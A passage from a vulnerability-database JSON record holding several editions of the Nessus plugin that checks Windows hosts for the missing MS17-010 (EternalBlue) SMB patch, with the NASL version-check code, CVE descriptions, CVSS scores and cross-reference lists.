value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS: CANVAS", "Metasploit: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption"]}, "lastseen": "2021-08-11T13:59:36", "differentElements": ["vpr"], "edition": 7}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "8671e37bcd65c38f125354bed64b17e2", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?d9f569cf", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?065561d0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.nessus.org/u?321523eb", "https://github.com/stamparm/EternalRocks/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-12T12:17:43", "history": [], "viewCount": 2959, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:42031"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96704", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}], "modified": "2021-08-12T12:17:43", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-08-12T12:17:43", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS: CANVAS", "Metasploit: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption"]}, "lastseen": "2021-08-12T12:17:43", "differentElements": ["exploitableWith", "nessusSeverity"], "edition": 8}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "b9abd8135dbfca43008678d0346e679b", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?065561d0", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/stamparm/EternalRocks/", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", 